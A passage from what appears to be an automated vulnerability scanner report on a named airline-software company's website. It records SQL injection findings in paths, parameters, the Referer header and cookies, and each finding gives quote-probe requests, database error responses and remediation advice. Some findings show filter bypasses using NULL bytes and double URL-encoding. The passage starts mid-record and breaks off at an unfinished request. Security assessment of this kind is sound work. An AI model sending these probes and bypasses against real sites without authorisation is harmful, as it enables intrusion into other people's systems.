GET /home/products_services'/product/technical_records_hub/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322173; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A1%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fairport%2F%22%3Bi%3A4%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fsabre_emd_manager%2F%22%3B%7D;
Response 1
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:24:33 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home/products_services''/product/technical_records_hub/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322173; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A1%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fairport%2F%22%3Bi%3A4%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fsabre_emd_manager%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]...
2.20. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_fleet_manager [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /home/products_services/sabre_airvision_fleet_manager?1%00'=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_fleet_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322569; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
Response 1
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 04:19:21 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home/products_services/sabre_airvision_fleet_manager?1%00''=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_fleet_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322569; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /home%2527/products_services/sabre_airvision_in-flight HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_in-flight/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
Response 1
HTTP/1.1 404 Not Found Date: Wed, 06 Oct 2010 04:17:51 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home%2527%2527/products_services/sabre_airvision_in-flight HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_in-flight/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /home/products_services/sabre_airvision_in-flight HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=' Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
Response 1
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 04:17:31 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home/products_services/sabre_airvision_in-flight HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q='' Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /home/products_services/sabre_airvision_in-flight HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_in-flight/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1'; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
Response 1
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 04:09:17 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home/products_services/sabre_airvision_in-flight HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_in-flight/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1''; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
The exp_last_activity cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_last_activity cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /home/products_services/sabre_airvision_network_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_network_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322572%00'; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
Response 1 (redirected)
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 04:18:45 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home/products_services/sabre_airvision_network_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_network_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322572%00''; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
Response 2
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 04:18:45 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /home/products_services/sabre_community_portal%2527 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_community_portal Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322307; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_res%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D;
Response 1
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 04:09:34 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home/products_services/sabre_community_portal%2527%2527 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_community_portal Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322307; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_res%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D;
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /home/products_services/services/airline_community HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%00' Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322629; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A3%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3Bi%3A4%3Bs%3A50%3A%22%2Fproducts_services%2Fautomated_exchange_and_refunds%2F%22%3B%7D;
Response 1
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:35:34 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home/products_services/services/airline_community HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%00'' Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322629; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A3%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3Bi%3A4%3Bs%3A50%3A%22%2Fproducts_services%2Fautomated_exchange_and_refunds%2F%22%3B%7D;
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /home/products_services/services/airline_community/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382'; exp_last_activity=1286322217; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A2%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fairport%2F%22%3B%7D;
Response 1
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:18:28 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home/products_services/services/airline_community/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382''; exp_last_activity=1286322217; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A2%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fairport%2F%22%3B%7D;
The exp_last_activity cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_last_activity cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the exp_last_activity cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
